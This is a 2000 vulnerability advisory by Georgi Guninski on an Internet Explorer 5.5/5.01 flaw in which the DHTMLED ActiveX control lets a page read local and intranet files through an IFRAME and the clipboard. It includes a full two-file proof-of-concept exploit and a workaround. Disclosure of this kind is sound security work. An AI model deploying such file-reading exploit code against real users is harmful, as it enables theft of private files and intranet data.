IE 5.5 and 5.01 vulnerability - reading at least local and from any host text and parsed html files

[joro () NAT BG (Georgi Guninski)]

Georgi Guninski security advisory #16, 2000

IE 5.5 and 5.01 vulnerability - reading at least local and from any host
text and parsed html files

Systems affected: IE 5.5, 5.01 / Win98 - probably other versions, have
not tested
Risk: Medium

Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski  is not liable for any damages caused by direct or  indirect
use of the information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this
program or any derivatives thereof.

Description:
Internet Explorer 5.5 and 5.01 under Windows 98 (suppose all other
versions are also vulnerable) allow reading local and from any host text
and parsed html files.
A danger is reading parsed web pages from intranet web servers behind a
firewall.
It is exploitable from HTML email message - Outlook.
This is achieved with the DHTMLED ActiveX control.

Details:
The problem is the DHTMLED (DHTML Edit Control Safe for Scripting for
IE5), which is used for basic HTML editing.
It allows opening a page with an IFRAME but have problems with DOM
protection.
It is possible to select the content of the IFRAME (which may be a
document residing anywhere, including local disk), copying it to the
clipboard and then reading it from the clipboard.
I have a feeling DHTMLED in combination with IFRAME may lead to more
dangerous security risks.

The code is:
------dh2.html--------------------------------
<SCRIPT>
alert("This page reads C:\\TEST.TXT\nYou may need to create it.");
function f1()
{
dh.DOM.all.I1.focus();
dh.DOM.all.I1.document.execCommand("selectall");
dh.DOM.all.I1.document.execCommand("copy");
r=document.all.S1.createTextRange();
r.execCommand("paste");
alert("Here is your file: "+S1.value);
}

function loadit()
{
dh.loadURL("http://www.nat.bg/~joro/ifr2.html";);
//                 ^^^^^^^^^^^^^^ You may need to edit this
setTimeout("f1()",5000);
}
setTimeout("loadit();",1000);
</SCRIPT>
---------------------------------------------------
---------ifr2.html---------------------------------
<HTML>
<IFRAME SRC="file://c:/test.txt" ID="I1" name="I1">
</IFRAME>
</HTML>
---------------------------------------------------

Demonstration is available at: http://www.nat.bg/~joro/dh2.html

Workaround: Disable Active Scripting or Disable Run ActiveX controls and
plug-ins (probably other workarounds).

Copyright 2000 Georgi Guninski

Regards,
Georgi Guninski
http://www.nat.bg/~joro